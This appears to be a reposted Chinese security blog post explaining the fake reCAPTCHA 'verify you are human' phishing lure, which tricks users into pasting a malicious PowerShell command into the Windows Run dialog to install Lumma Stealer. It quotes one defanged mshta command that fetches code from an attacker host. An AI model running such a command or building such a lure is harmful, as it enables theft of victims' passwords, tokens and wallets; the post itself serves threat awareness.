reCAPTCHA 网络钓鱼是在2024 年 8 -9 月在野发现的一种新型钓鱼方式,本文用以描述和演示此钓鱼方式。
最初看到的是“验证你是人类”的弹窗,这和以往没什么不同,但是此次的钓鱼也是借助了人们对此行为的习惯,通过让使用者复制粘贴payload从而实现攻击。
它实际上指示用户使用热键Win+R打开 Windows 运行对话框,并让他们使用Ctrl+V Web 浏览器已预先复制到剪贴板中的恶意命令。
虽然,看起来有点过于简单直接,但是其却出奇的有效...
截至 2024 年 8 月下旬,攻击者一直在使用欺诈性的“人工验证”页面来诱骗用户执行恶意 PowerShell 脚本。Lumma Stealer 旨在从受感染的计算机中窃取敏感信息,例如密码、会话令牌、加密货币钱包和其他个人数据。
假验证码页面
恶意PowerShell脚本的执行
mshta hxxps[:]//propller.b-cdn[.]net/propllerweb页面js代码
原文始发于微信公众号(合规渗透):脑洞大开的新型钓鱼方法 -- reCAPTCHA 网络钓鱼
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论